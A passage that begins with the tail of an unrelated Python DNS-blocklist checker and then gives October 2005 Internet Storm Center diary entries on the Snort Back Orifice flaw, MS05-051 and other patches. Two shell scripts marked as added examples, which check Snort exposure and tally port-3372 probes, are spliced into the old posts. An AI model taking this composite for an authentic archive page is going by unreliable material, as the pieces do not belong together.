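FAKE_DNS = {
    "4.3.2.1.dynamic-list.example.": "127.0.0.10",   # listed as 'dynamic'
    "5.3.2.1.hijacked.example.":     "198.51.100.7",  # NXDOMAIN rewritten by a resolver
}


def fake_resolve(name: str) -> Optional[str]:
    return FAKE_DNS.get(name)


if __name__ == "__main__":
    zones = ["dynamic-list.example", "hijacked.example"]
    for address, listed in check_range("1.2.3.4/30", zones, fake_resolve).items():
        print(address, listed)
```

Running this from the monitored range itself is the point: a listing shows up in your own logs before the first bounced message does, and the unlisting request can then go out through a different path.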


Published: 2005-10-20

Big Honkin' Botnet - 1.5 Million!

A diligent reader from the Netherlands requesting anonymity (lots of folks doing that today) pointed us to this article about a recent botnet bust in the Netherlands.  The article is in Dutch, but our reader translates it thusly:

"The botnet put in the spotlight by the Dutch National Criminal Investigation unit about two weeks ago was found to comprise approximately 1.5 million hacked computers (instead of the 100k reported earlier). This was discovered by GovCert.nl, the Dutch Computer Emergency Response Team, while dismantling the network of computers infected with a Trojan horse. Of the total number of infected computers, it was estimated that only 30,000 were located in the Netherlands.

The court of Breda has decided to keep the 19-year old suspect as well as a companion, in custody. This companion is suspected of being responsible for a so-called Denial of Service (DoS) attack after an extortion attempt of a US-based company. Earlier on in the investigation both of them were suspected of being involved in another DoS attack of a US based company.

More arrests related to this investigation are anticipated."

Woohoo!  Bad guys in jail.  You gotta love that.

From a trend perspective, I've been noting two things, which I've also heard fellow handler that I call Ekim Roop mention.  We're seeing some smaller botnets, which are more highly differentiated (that is, a single bad guy might have three or four botnets, each doing one element of a given crime.  One set of bots for spamming, another for a distributed web site for phishing, and another to obscure surfing through proxying.)  At the same time, we're also seeing some very vast botnets, this time over a million.  We may even go higher than that in the future. 

Scary stuff.  Keep fighting the good fight, dear readers.  We must.

Over and out--
--Ed Skoudis


Published: 2005-10-20

Sploits Du Jour: Veritas NetBackup & Ethereal. Watch Oracle and Snort!

Lots of new exploits today in the wild, so patch away, patch away, patch away all. 

In particular, patch Veritas NetBackup (more info here).  Working exploits have been released.

Also, patch Ethereal (more info here).  Again, working exploits are available.

Also, as we said the other day, don't forget to check out the crucial Oracle patches.

And, for goodness sakes, patch Snort or shut off the Back Orifice preprocessor!  A fully working exploit is likely very near.

Also, a kind reader emphasized the importance of hardening systems today, in light of this Snort vulnerability, mentioning the great grsecurity package for Linux, as well as the importance of chroot environments.  Also, this reader requesting anonymity points out that the Stack-Smashing Protector (SSP) extensions for gcc from IBM make it harder to exploit buffer overflows, and can be compiled into various executables.  It's essentially an update of the venerable StackGuard tool, but more carefully integrated with the compiler itself.  As we say in Jersey... "Noice".


Published: 2005-10-20

Fraud: Evil People Doing Evil Things

A diligent Internet Storm Center reader pointed us to this site which describes the Digital Age Fraud appearing on many credit cards.  We've had a handful of reports of people seeing fraudulent charges on their credit cards for $24.99, and this site describes some of what's happening.  We don't know the people who run this site, so be careful.  Still, they link to the Secret Service and give some very solid advice for victims of credit card fraud.


Published: 2005-10-20

Back to Green on the Snort BO Buffer Overflow

We've decided to go back to green on the Snort Back Orifice pre-processor buffer overflow vulnerability.  The reason for ratcheting down to green is primarily this: if you haven't shut off the Back Orifice preprocessor by now or come up with another work around, you probably aren't going to in the near future.  This is still a hugely important issue, but our infocon status is designed to reflect changes in the threat level.  So, we're back at green, but reserve the right to go to Yellow or higher if a worm starts to spread using this vulnerability.  From our internal deliberations, such a worm would be highly problematic.  BTW, as Kyle Haugsness pointed out last night in this article, HD Moore has recently released some piece-parts of a sploit for this flaw in Metasploit.  We're very close to full exploitation, so shut off that darn preprocessor ASAP.  Also, check with your vendors if you suspect your commercial product may have Snort code in it.  Several IDS and IPS tools do, so watch out!


Published: 2005-10-20

Snort BO status update

Here is an update regarding the Snort Back Orifice pre-processor vulnerability...(Kyle Haugsness Oct. 20 05:30 UTC)

When this vulnerability was announced yesterday, I was curious to see how difficult this would be to exploit due to the widespread nature of Snort.  After doing a little research on the encryption method in Back Orifice, I was able to develop working exploit code in 2 hours.  Bad news!!  Of course, we aren't in the business of releasing exploits, so this code is staying private.  Now, it appears that HD Moore is very close to having exploit code working as a plugin to metasploit.  If we haven't said it loudly enough already, PLEASE UPGRADE your Snort sensors or disable the BO pre-processor if running the vulnerable versions of Snort 2.4 series.  I checked the 2.3.2 source tree today and it is not vulnerable.

How about defensive measures?  If you are running Snort and are able to upgrade, then the new version should detect the exploit attempt.  But I am working on two additional defensive tools.  The first is a Snort signature that should catch the exploit attempt.  This should be available real soon now (tm).

The second tool may prove to be much more valuable.  This tool is necessary because of the fact that the exploit can be triggered on any UDP port (except 31337) and that all Back Orifice traffic is encrypted.  I don't want to give away more information at this point, since it will help the exploit writers.  The tool is a standalone program that utilizes libpcap to sniff traffic and decode UDP traffic looking for the exploit.  It will be useful to folks that can't upgrade their Snort daemon to get the new detection it provides, but still want to see if they are being attacked.  Secondly, this will be useful to people running a different IDS system that can't decode the Back Orifice encryption.  Third, it will probably be very useful in identifying a global worm outbreak. 

Since time is of the essence here, I am hoping to have this tool available very shortly.  It will require libpcap and is being developed on Debian Linux.  It will not require Snort to be running.  Since code portability isn't my strong suit, we may be looking for people to test and port the code to FreeBSD, Solaris, etc.  Please drop us an e-mail if you would be willing to help in this area.  The source code is currently about 800 lines.


Published: 2005-10-19

Oracle Critical Patch Update and Security Alert

For those that are using Oracle products - you may want to take a look at US-CERT Technical Cyber Security Alert TA05-292A. It states that various Oracle products and components are affected by multiple vulnerabilities. The impacts of these vulnerabilities include unauthenticated, remote code execution, information disclosure, and denial of service.

Oracle released a Critical Patch Update in October 2005 which addresses more than eighty vulnerabilities in different Oracle products and components.

Oracle Critical Patch Update and Security Alert


Published: 2005-10-19

Infocon Yellow: Snort BO Vulnerability

After some deliberation, we feel that the Snort Back Orifice pre-processor vulnerability could become a big problem very fast. As a result, we turned the Infocon status to 'yellow'.

You have a problem if you run Snort Version 2.4 (other than 2.4.3), and if you have the 'bo' preprocessor enabled.

Why do we think this is a big deal:
  • The exploit is rather easy to write. Yes, it's specific to a particular binary, but there are a number of common binaries deployed in large numbers.
  • It uses a single UDP packet, which can lead to very fast spreading worms.
  • The UDP packet can be spoofed, and can use any port combination.
  • Snort is very popular. A fast spreading (noisy) UDP worm could lead to local slowdowns/outages.
The quick fix is to disable the BO preprocessor. Please do so NOW (if you haven't already). Worry about upgrading Snort later, after you have done your testing. But having gone through this myself, it's not that hard.

Snort before version 2.4 is not vulnerable. Neither is any Snort install that does not have the bo preprocessor enabled.

Please let us know if you see exploits posted, or have other details to share. We expect to stay on 'yellow' for about 12-24 hrs unless there are any new developments.


Published: 2005-10-18

Oracle Patches

Don't forget to check out today's Oracle patches. I haven't gotten around to looking at the details yet, but if you run Oracle, take a look and let us know what is important and noteworthy.


Published: 2005-10-18

Snort BO pre-processor Vulnerability

ISS released an advisory regarding a vulnerability in Snort's Back Orifice pre-processor. The vulnerability could be used to execute arbitrary code on the Snort sensor. Also, see the advisory at snort.org for more details.

As an immediate step, disable the BO preprocessor by commenting out the "preprocessor bo" line in snort.conf, so that it reads:
# preprocessor bo

This should eliminate the issue, and these days Back Orifice is not all that much of a threat compared to other trojans/bots. You should also consider upgrading to Snort 2.4.3, which will fix the issue.
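The two conditions stated in the Infocon Yellow entry above (Snort 2.4.x below 2.4.3, plus an active 'bo' preprocessor line) are easy to check from a shell on each sensor. The script below is an added example written for this page; it is not ISC's or the Snort project's code. It assumes the version is handed in as a plain "major.minor.patch" string and that the config file uses the snort.conf "preprocessor bo" syntax shown above; the "snort -V" banner parsing in installed_snort_version is an assumption about the banner layout and is not used by the demo.

```shell
#!/bin/sh
# Added example (not ISC's or Snort's own code): decide whether a sensor is
# exposed to the Back Orifice preprocessor overflow described above.

# Return 0 if an uncommented "preprocessor bo" line is present in the config,
# 1 otherwise.  Lines starting with '#' (the workaround above) do not match.
bo_preprocessor_enabled() {
    conf="$1"
    grep -Eq '^[[:space:]]*preprocessor[[:space:]]+bo([[:space:]]|:|$)' "$conf"
}

# Return 0 if the version is in the affected range: the 2.4 series before
# 2.4.3.  2.3.x and earlier do not carry the vulnerable code; 2.4.3 is fixed.
snort_version_affected() {
    ver="$1"
    mm=$(printf '%s' "$ver" | cut -d. -f1,2)
    patch=$(printf '%s' "$ver" | cut -d. -f3 | sed 's/[^0-9].*//')
    [ -z "$patch" ] && patch=0          # "2.4" means 2.4.0
    [ "$mm" = "2.4" ] && [ "$patch" -lt 3 ]
}

# Assumption: 'snort -V' prints a banner containing "Version X.Y.Z".
# Use this to feed check_snort_bo on a live sensor; the demo below does not.
installed_snort_version() {
    snort -V 2>&1 | sed -n 's/.*Version \([0-9][0-9.]*\).*/\1/p' | head -n 1
}

# Combine both conditions.  Returns 0 (and prints VULNERABLE) when the sensor
# needs the workaround or an upgrade, 1 otherwise.
check_snort_bo() {
    ver="$1"; conf="$2"
    if snort_version_affected "$ver" && bo_preprocessor_enabled "$conf"; then
        echo "VULNERABLE: Snort $ver with bo preprocessor enabled in $conf"
        return 0
    fi
    echo "ok: Snort $ver, bo preprocessor not active or version not affected"
    return 1
}

# Stand-alone demo on a constructed snort.conf fragment (not a real config).
demo_conf=$(mktemp)
printf 'preprocessor frag2\npreprocessor bo\npreprocessor stream4: detect_scans\n' > "$demo_conf"
check_snort_bo "2.4.2" "$demo_conf"
rm -f "$demo_conf"
```

On a real sensor, run check_snort_bo "$(installed_snort_version)" /etc/snort/snort.conf. A "VULNERABLE" verdict means either comment out the bo line and restart Snort, or move to 2.4.3; a sensor that only has the line commented out stays reported as ok, which is the intended reading of the workaround above.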


Published: 2005-10-18

MS05-051 exploit spotted

Trend Micro reports that they spotted a POC for MS05-051 in the wild. They found it included as a new exploit in other malware. We don't have any details yet beyond what can be found at Trend Micro. If you find a copy of this malware, please forward it.

Trend Micro states that the malware was written in Visual Basic, which usually indicates some low skilled bot-kid. Kind of odd to see it surface this way, but having it included as a new warhead in existing malware matches past patterns.

We will update this diary as we learn more.


Published: 2005-10-17

GPL Nessus Forks

In case you have missed the announcement, Tenable Security has decided to commercialize the popular Nessus security scanner within the next month.

As a result, a project group has been formed to release a GPL fork of the Nessus security scanner in the future.  This product will probably undergo a name change to prevent problems with support between the commercial scanner and the new GPL fork.  In the meantime, it is located at http://www.gnessus.org/doku.php .

Additionally, Handler Kevin Liston noted that another GPL nessus project is located at http://porz-wahn.berlios.de/homepage/about.php
Scott Fendley
Handler on Duty

Published: 2005-10-17

Entertaining Bug in Microsoft Word

Earlier this afternoon, Marc Sachs found an interesting (and entertaining to me) bug in Microsoft Word.  It would seem that the synonym lookup feature does not handle certain words properly.  To try this for yourself, open your version of Microsoft Word and type the word information.  Then right click on the word, and then select the "Synonyms" menu item (see below).  You will note that the entertaining bug has given you words based on the words "in   formation" not the single word "information".  For those wondering, this screen shot came from Microsoft Word 2003 with SP2 (11.6568.6568).  Other versions of Word may or may not experience this glitch as we have not tested them.

For those thinking "Where is the security implication of this?", take this as an editorial on software complexity and its connection to security flaws.  As software has become more complex, we have seen more and more security flaws found.  Simple enough, right? To restate it a little differently, software complexity and flaws detected are directly related. This may not always stay the case, but that is common wisdom in today's world.  (Side note:  This is not a gripe against Microsoft and should not be read in that light.  This is just as relevant to any software vendor.)

In this increasingly complex software, how many flaws are there which have remained undetected for years? How many very simple oversights, like the one above, exist in more sensitive modules with security ramifications?  How long can a minor flaw stay undetected in popular software packages? 

To me, this is a very sobering thought, especially considering the number of ecommerce or medical sites on the Internet today.  Somehow, I will not let it make me lose sleep over the (in)security of my private information on the Internet.

For those that have copious spare time, feel free to send in other single-word examples of the above to our attention. Hyphenated words are troublesome to native speakers, much less computers.  If you find any words, please also submit what version of Word exhibited this issue.  We will try to find an appropriate contact within Microsoft to send the examples to.


Published: 2005-10-17

Pedro's Malware Analysis Quiz

For everyone that is following along with Pedro Bueno's malware analysis quiz, here is a quick announcement.  Pedro has updated Quiz II with the answers, and has placed Quiz III up on his website for your perusal.  For those that would like to know more about what I am talking about, please check out http://handlers.dshield.org/pbueno/ for information.

Scott Fendley
Handler on Duty


Published: 2005-10-14

Possible Patch Problems

We have had a report of problems with MS05-051.  Here is what we have received.  If anyone else is experiencing problems, please let us know.

A number of people have reported weird problems with one of the MS patches released yesterday, specifically MS05-051 Vulnerabilities in MSDTC and COM+ Could Allow Remote Code Execution (902400).

Symptoms include, but are not limited to:

- Inability to visit Windows Update
- Inability to use the Search tool off the Start Menu
- blank screen (no icons) upon login
- Symantec LiveUpdate stops working
- SpySweeper stops working
- problems with Office apps
- VirtualPC becomes extremely sluggish

Lee said he had spoken to a Microsoft engineer about this.  From what he could tell:

"this issue is only affecting people with very specific NTFS permissions. If the C:\Winnt\Registration folder is locked down and cannot be written to by COM+ you will have errors similar to those listed in your alert. All of those tasks use COM+ in one way or another."

Another perspective from Microsoft:

'The solution will be available at http://support.microsoft.com/?id=909444,
and will be linked to from the MS05-051 bulletin - hopefully within the
hour.  Feel free to communicate the cacls solution to anyone you come across
until then. This is not a "known issue" or "problem" with the patch, but a
"complexity with the increased security provided by the patch when running
on systems where settings have been incorrectly changed from the default

Uninstalling patch 902400 seems to do the trick for most folks.  You may need to check the "Show Updates" box under Add/Remove Programs to see the hotfixes.  The better answer is calling Microsoft directly; this should be a free call if the issue is problems with a patch.  The US number is 866-727-2338.  Outside of the US, see http://support.microsoft.com/common/international.aspx?rdpath=4 .


Published: 2005-10-14

Weekend Predictions.

Remember Zotob? In Internet-Security time, it was a long long time ago. Almost 2 months now. The Friday before Zotob hit the news we went to infocon yellow, in order to warn people about the upcoming storm.

Now this week started in a very similar way, with a large number of Microsoft patches. In particular the MS DTC vulnerability (MS05-051) has a lot of promise. Like the PnP vulnerability used for Zotob, it could target Win2k quite efficiently. At this point, the only thing missing is a widely available exploit, but given that there are a number of private/commercial exploits, a public one is probably right around the corner.

So what should you do today before you head home for the weekend:

The obvious thing is to apply patch MS05-051 on at least your Win2k systems. We do know that port 3372 scanning has started in full force, likely in order to acquire target lists. If you can't patch, at least make sure port 3372 is closed. Windows 2000 does not come with its own host based firewall, but you can use IPSec policies to achieve the same effect. See this paper by David Taylor for details.

What will happen this weekend? I invited other handlers to add their own opinions/predictions to this story. In my opinion, we will not see widespread exploits. This can change quickly, but is also dangerous in its own way. Zotob showed very nicely how an exploit will not get too much attention until it hits a couple of high profile targets. The scenario I am most afraid of is the use of an exploit by a small group to attack high value targets. Remember the "Russian key logger" episode (Berbew)? A group exploited a number of well known web sites using the IIS SSL vulnerability, and came back months later to plant an Internet Explorer exploit. We are "ripe" for a repeat of this scenario, in particular given the rich selection of new client exploits released.

What should you do this weekend? Stay close to your pager. In particular, don't consider yourself safe as long as CNN isn't reporting about it. Make sure your IDS is set up with MS05-051 signatures, and see if you can just log all port 3372 traffic. Use the rest of today to collect some data so you have a baseline if things turn bad. I don't like to recommend turning systems off, but well, there is nothing more secure than a system disconnected from power.
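The baseline the paragraph above asks for is easiest to build from whatever already logs port 3372 at your border. The script below is an added example for this diary, not an ISC tool: it summarises TCP/3372 connection attempts per source from Linux iptables LOG lines, so that a spike in distinct sources or in attempts from one source stands out over the weekend. The log lines it parses are constructed for the example (documentation addresses, not real traffic), and the LOG rule quoted in the comment is standard iptables syntax assumed here, not something the diary entry itself gives.

```shell
#!/bin/sh
# Added example (not ISC's own tooling): per-source baseline of TCP/3372
# (MS DTC) probes from iptables LOG lines.  A rule that produces such lines on
# a Linux border host is (assumption, standard iptables syntax):
#   iptables -I INPUT -p tcp --dport 3372 -j LOG --log-prefix "DTC-3372 "

# Print "count source" pairs, busiest first, for TCP packets to port 3372.
# The trailing ( |$) keeps DPT=33720 and similar from matching; UDP and other
# destination ports are skipped so the count reflects DTC probes only.
dtc_sources() {
    log="$1"
    grep -E 'PROTO=TCP .*DPT=3372( |$)' "$log" \
      | sed -n 's/.*SRC=\([0-9.]*\).*/\1/p' \
      | sort | uniq -c | sort -rn \
      | awk '{print $1, $2}'
}

# Number of distinct sources probing 3372: the single figure to note down
# today and compare against tomorrow.
dtc_unique_sources() {
    dtc_sources "$1" | wc -l | tr -d ' '
}

# Sources with at least $2 attempts, one per line (candidates for a block).
dtc_noisy_sources() {
    log="$1"; threshold="$2"
    dtc_sources "$log" | awk -v t="$threshold" '$1 >= t {print $2}'
}

# Constructed sample log (not real traffic) in iptables LOG format.  One
# source sweeps three hosts, one probes once, one UDP packet and one port-445
# probe are noise that must be ignored.
write_sample_log() {
    cat > "$1" <<'EOF'
Oct 14 09:12:01 gw kernel: DTC-3372 IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=48 PROTO=TCP SPT=3281 DPT=3372 WINDOW=65535 SYN
Oct 14 09:12:01 gw kernel: DTC-3372 IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.11 LEN=48 PROTO=TCP SPT=3282 DPT=3372 WINDOW=65535 SYN
Oct 14 09:12:02 gw kernel: DTC-3372 IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.12 LEN=48 PROTO=TCP SPT=3283 DPT=3372 WINDOW=65535 SYN
Oct 14 09:13:10 gw kernel: DTC-3372 IN=eth0 OUT= SRC=203.0.113.45 DST=192.0.2.10 LEN=48 PROTO=TCP SPT=1044 DPT=3372 WINDOW=16384 SYN
Oct 14 09:14:33 gw kernel: OTHER IN=eth0 OUT= SRC=203.0.113.99 DST=192.0.2.10 LEN=48 PROTO=TCP SPT=1050 DPT=445 WINDOW=16384 SYN
Oct 14 09:15:00 gw kernel: DTC-3372 IN=eth0 OUT= SRC=192.0.2.200 DST=192.0.2.10 LEN=76 PROTO=UDP SPT=33720 DPT=3372 LEN=56
EOF
}

# Stand-alone demo.
demo_log=$(mktemp)
write_sample_log "$demo_log"
echo "distinct sources probing TCP/3372: $(dtc_unique_sources "$demo_log")"
dtc_sources "$demo_log"
echo "sources with 3 or more attempts:"
dtc_noisy_sources "$demo_log" 3
rm -f "$demo_log"
```

Point dtc_sources at /var/log/kern.log (or wherever your syslog routes kernel messages) and run it once today and once per shift over the weekend; a jump in the distinct-source count, or a single source sweeping many of your hosts, is the signal to look at before anything shows up on the news.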

Please use our forum to share your own opinions and predictions.


Published: 2005-10-14

FrSIRT exploits for MS05-044, MS05-045, and MS05-048

Within two days, we already have proof-of-concept exploit code for MS05-044, MS05-045, and MS05-048.  The three can be found at:
Microsoft Collaboration Data Objects Buffer Overflow PoC Exploit (MS05-048)
Microsoft Windows Network Connection Manager Local DoS Exploit (MS05-045)
Microsoft Windows FTP Client File Location Tampering Exploit (MS05-044)
Many thanks to John Otterson and Eric Griswold for noticing this.


Published: 2005-10-13

Increased activity on TCP port 5250

As an update, we have had some readers (thanks Dr. Neal Krawetz, Thomas Schmitzer and Brian Porter) point us to an exploit against the iGateway service.  This exploit was released on October 10 by FrSIRT and appears to be what is causing the traffic.  It allows for a telnet session to port 1711, which also shows a one day increase.   Thanks for all the input and if someone happens to grab packets, we'd still like to see them to confirm.  Also a thanks to Greg Holmes for bringing this to our attention!

If you have captures of any of this traffic, please upload them via the contact page.  Thanks in advance.


Published: 2005-10-13

MS05-044 Folder View for FTP Sites - mailbag item

This is my slightly edited email response to a great point about Microsoft's MS05-044 Security Bulletin; it is the result of email exchanges with a contributor who wishes to remain anonymous:


Well, Microsoft makes "Folder View for FTP Sites" a complex subject and certainly one I may be able to post "Workaround" information on in a Diary post.

AFAICT there are many variables involved in OS and IE "installation" (OEM settings, etc.) that can affect FTP Folder views. I did read a ton of MS KBs and the two best on the specific issue are referenced below. And I really appreciate your polite persistence in pushing me to read up on this important item. Thank you!

You're right that MS is misleading in its Security Bulletin presentation. Because so many factors like OEM and customer installation settings can enable the FTP folder view, the Security Bulletin should state a clear workaround on how to look for it in the IE Advanced tab and clearly state that you can disable it by unchecking/clearing it.

In the bulletin, in the "Mitigating Factors for FTP Client Vulnerability - CAN-2005-2126:" section MS says;
"By default, the "Enable Folder View for FTP Sites" Internet Explorer setting is disabled on all affected operating system versions. An attacker would only be successful if the user manually enables the "Enable Folder View for FTP Sites" Internet Explorer setting on the affected system." This is clearly misleading!

And in the "Workarounds for FTP Client Vulnerability - CAN-2005-2126:" section they only say "Do not download files from un-trusted FTP servers" when they should ADD;

To disable FTP Folders, follow these steps:
1. Click Start, point to Settings, click Control Panel, and then double-click Internet Options.
2. Click the Advanced tab.
3. Under Browsing, to disable FTP Folders, CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box.
NOTE: When you CLEAR/UNCHECK the Use Web Based FTP or Enable Folder View for FTP sites check box, you are disabling FTP Folder functionality.

So let me try and work something up on that end and see if I can get it into the diary.

Highest regards,


No option to install Web Folders when you install Internet Explorer 6
Article ID : 298637
Last Review : June 20, 2005
Revision : 5.0

How to Install and Use FTP Folders
Article ID : 217888
Last Review : September 28, 2004
Revision : 3.1  


Published: 2005-10-12

MS05-051 exploit info and rumors

Patch yesterday folks. So far we're aware that an MS05-051 exploit is in the hands of immunitysec Canvas customers - "October 11, 2005: MS05-051 (MS DTC) Trigger for the bug in MS DTC on Windows 2000"

In addition we're seeing reports of non-specific exploit warnings from managed security service providers to their customers. And some rumors.

McAfee Vulnerability Information says that they have protection against exploits of MS Vulnerability MS05-051, "Entercept's Generic Buffer Overflow Protection protects against code execution that may result from exploiting this vulnerability."

ISS says they have protection out for an exploit; its announcement is here.

NFR says they have protection out for an exploit. Their announcement is here.

Here are some facts from before the vulnerability announcement: see the DShield data on port 3372 scanning, ymmv.

We'll post anything else that's specific and critical when we get it.


Published: 2005-10-12

24 BEA WebLogic Vulnerabilities and Security Issues

See Secunia's BEA WebLogic 24 Vulnerabilities and Security Issues alert of the issues. Make sure you have plenty of free time, and it's nice to see that this was piled on top of MS Black Tuesday patches.


Published: 2005-10-12

Belated "deja vu" - IR for rootkits that run in safe mode

I was a little busy last August 1st and didn't notice that there was a new glitch in the Matrix, a haxdoor variant that's a real problem for first tier IR folks because "It also ......, drops rootkits that run in safe mode." So a number of weeks later when the second haxdoor variant that "drops rootkits that run in safe mode" was being analyzed by Handlers Tom Liston and Lorna Hutcheson, my jaw was dropping as I read Symantec's August 1st recommendations for "cleaning". To say the least, Symantec's documented recovery instructions are onerous, and first responders should at least read their instructions and compare them to an alternative mentioned below.

Since I then knew of only 2 haxdoor versions which create the SAFEMODE cleaning issue (flattening is still preferred here), and since this cleaning issue doesn't seem to have created any significant AV vendor issues in the middle of this year's malware fe$tival, I dropped a line to some AV acquaintances about the IR response problems these two variants create.

To make a long story short, F-Secure took a look at the second "safe mode" variant and said "Yes, this variant uses the similar registry keys/values. Haxdoor indeed does run in safemode. Symantec's recommendation about recovery console is probably the easiest way to delete haxdoor without any special tools. F-Secure BlackLight also can identify and rename haxdoor's files. So I'd recommend users to try that first. It is far easier to use than recovery console."

Whether or not your AV vendor addresses this issue, please drop me a line. Thanks!

Also, thanks very much Lorna, Tom and Jarkko!

F-Secure BlackLight Beta

Symantec Backdoor.Haxdoor.E, "Discovered on: August 01, 2005"

Tom's analysis mentioning the second variant is in the Handler's Diary September 22nd 2005, see Follow the Bouncing Malware IX: eGOLDFINGER


Published: 2005-10-12

Autoruns updated October 6th

Autoruns v8.22 was released on October 6th, "This Autorun update supports arbitrary length Registry and file system paths, adds a find capability to search through configured items, introduces a comparison feature to compare current autostarts with a previously saved version so that you can easily identify new additions, and knows about yet more autostart locations including the Winlogon boot verification Registry value and Shell open hijacks."

The previous registry value length problem was covered by Handler Daniel Wesemann, with many reader contributions, in Nasty Games of Hide and Seek in the Registry


Published: 2005-10-12

VERITAS NetBackup Vulnerability - remote

Veritas has announced a vulnerability, Document ID: 279085, describing a remotely exploitable "format string overflow vulnerability in the Java authentication service, bpjava-msvc, running on NetBackup servers and clients" that is "known to affect the application server for the NetBackup Java GUI."

"The vulnerable daemon listens on port 13722 on both NetBackup servers and clients."

Affected products:

NetBackup 4.5, all versions, all platforms.
NetBackup 5.0, all versions, all platforms.
NetBackup 5.1, all versions, all platforms.
NetBackup 6.0, all versions, all platforms.

Their suggested workaround:
Block external network access on TCP port 13722

Symantec's version of the vulnerability announcement - VERITAS NetBackup: Java User-Interface, format string vulnerability


Published: 2005-10-11

Black Tuesday Summary

Thanks to Lorna for putting together a summary of today's patching fun:

Bulletin  Supersedes                                        Severity   Impact
MS05-044  N/A                                               Moderate   Tampering
MS05-045  N/A                                               Moderate   Denial of Service
MS05-046  N/A                                               Important  Remote Code Execution
MS05-047  MS05-039                                          Important  Remote Code Execution and Local Elevation of Privilege
MS05-048  N/A                                               Important  Remote Code Execution
MS05-049  MS05-016, MS05-024                                Important  Remote Code Execution
MS05-050  MS05-030                                          Critical   Remote Code Execution
MS05-051  MS05-010, MS05-026, MS05-039, MS05-012, MS04-012  Critical   Remote Code Execution
MS05-052  MS05-037, MS05-038                                Critical   Remote Code Execution


Published: 2005-10-11

MS05-049 Windows Shell Vulnerability

MS05-049: Vulnerabilities in Windows Shell Could Allow Remote Code

Impact: Remote Code Execution
Rating: Important
Supersedes: MS05-016 and MS05-024

This bulletin has three Parts to it.

Shell Vulnerability - CAN-2005-2122: A vulnerability exists in the way that Windows handles the .lnk file extension. A .lnk file is a shortcut which points to another file and can contain properties that are passed on to the file it points to. As such, an attacker taking advantage of this would be able to execute code on the victim's system by getting the victim to open the .lnk file.

Shell Vulnerability - CAN-2005-2118: Same information as above. The main difference appears that instead of opening the .lnk file, the victim only needs to view the properties of the .lnk file.

Web View Script Injection Vulnerability - CAN-2005-2117: This vulnerability deals with the Web View format used by Microsoft Explorer to view files and their information. A vulnerability exists in the way that Microsoft handles the validation of HTML characters within certain fields of the files. An attacker taking advantage of this would be able to take complete control of the victim's system if the victim views the malicious file with the Web View format turned on in Explorer.



Published: 2005-10-11

MS05-046 Client Service for NetWare Vulnerability

MS05-046 affects "Customers who use the Client or Gateway Service for NetWare" using Microsoft Windows 2000 Service Pack 4, Windows XP Service Pack 1, XP Service Pack 2, Windows Server 2003 and Windows Server 2003 Service Pack 1.

The update "resolves a newly-discovered, privately-reported vulnerability", MS rates it Important, and MS says update at your "earliest opportunity".

I rate it "Critical", test and deploy this update ASAP. One reason is that Microsoft notes "CSNW is commonly associated with the Internetwork Packet Exchange (IPX) and Sequenced Packet Exchange (SPX) protocols. However, CSNW could be exploited by using any installed protocol".

In the MS list of workarounds, one reasonable workaround is "Block TCP ports 139 and 445 at the firewall" and "use a personal firewall". An unreasonable workaround is that MS says you can remove CSNW.

CVE CAN-2005-1985 is "(under review)" and "Reserved" so far.

NOT AFFECTED - Microsoft Windows XP Professional x64 Edition, Windows Server 2003 for Itanium-based Systems, Windows Server 2003 with SP1 for Itanium-based Systems, Windows Server 2003 x64 Edition, Windows 98, Windows 98 Second Edition (SE), and Windows Millennium Edition (ME).



Published: 2005-10-11

MS05-044 Windows FTP Client File Transfer Location Tampering

MS05-044 Vulnerability in the Windows FTP Client Could Allow File Transfer Location Tampering

KB: 90595
CVE: CAN-2005-2126

This bulletin and related patch resolves a newly discovered public vulnerability.  The flaw exists in the Windows FTP Client on Windows 2000 SP4 (with IE 6 SP1), XP SP1 and Windows Server 2003 computers.  An attacker can exploit the flaw to tamper with the file transfer location on the client during an FTP file transfer session.  When a client has manually chosen to transfer a file via FTP on affected systems, the attacker can redirect the storage location to a location such as the Startup folder.  In general, if you do not download files from un-trusted FTP (or any other) servers then you really won't have a problem.  Unfortunately, most end users are too trusting of links on the web and in email and can be exploited in a few situations.

Per Microsoft, the vulnerability is mitigated in 3 ways.

1) "The attacker would have to successfully persuade end users to visit an FTP server hosting files with specially-crafted file names" and would not have a way of forcing the files to be transferred.  This would require our end users to interact with dialog boxes and click on links without concern.
2) If the file of the same name already exists in this alternate location, then an "Overwrite File" warning message will be presented.  If end users click through the dialog box, then it will go ahead and overwrite the file.
3)  If the Internet Explorer setting "Enable Folder View for FTP Sites" is changed from the default disabled state, then the attack will be successful.



Published: 2005-10-11

MS05-051 Vulnerabilities in MSDTC and COM+

MS05-051 is actually 3 unrelated vulnerabilities wrapped into one advisory. To aid in our discussion, I split it into '05-051-A' through '05-051-C':

MS05-051-A: MSDTC Vulnerability
KB: 902400
CVE: CAN-2005-2119

MSDTC stands for "Microsoft Distributed Transaction Coordinator". This facility allows programmers to combine updates sent to several programs or systems into a "Transaction", which ensures consistency across several applications.

This vulnerability is particularly serious for Windows 2000. In the case of Windows 2000, a remote user may trigger the vulnerability without having to log in. For Windows 2k3 and XP, a user would have to log in first.

Either way, an exploit for this vulnerability would provide full system access. One of the other non-system vulnerabilities could leverage the MSDTC problem to gain full system access.

As a quick workaround, you should disable network access to DTC. See this MSDN Article for details. Even if you patch, you should still disable remote access to DTC if you don't need it.

Quick commands to disable DTC:

sc stop MSDTC & sc config MSDTC start= disabled

eEye discovered the vulnerability and provided a cookbook for writing an exploit as part of its advisory. It shouldn't take too long to see this exploited.

Additional information about this vulnerability has been published by iDefense, available at http://www.idefense.com/application/poi/display?id=319


MS05-051-B: COM+ Vulnerability
KB: 902400
CVE: CAN-2005-1878

COM+ is used to allocate resources to applications. By keeping, for example, connection pools and allocating connections as needed to processes, programs can run faster as they do not have to initiate a new connection each time.

On Win2k and XP-SP1, an attacker can use this vulnerability to remotely obtain administrator privileges without having to authenticate. On XP-SP2 and Win2k3, this vulnerability can only be used to escalate privileges of a local authenticated user.

Standard firewalling procedures (UDP 135,137,138,445 and TCP 135,139,445,593) can help mitigate the vulnerability. However, if you have COM Internet services enabled, or RPC over HTTP, you will also have to firewall port 80 and 443.

Patching this vulnerability is critical for Win2k users. XP-SP1 users should patch and update to SP2 if possible. You may also want to consider disabling DCOM in addition to patching. See the MSFT bulletin for details.


MS05-051-C: TIP Vulnerability and Distributed TIP Vulnerability
KB: 90240
CVE: CAN-2005-1979, CAN-2005-1980

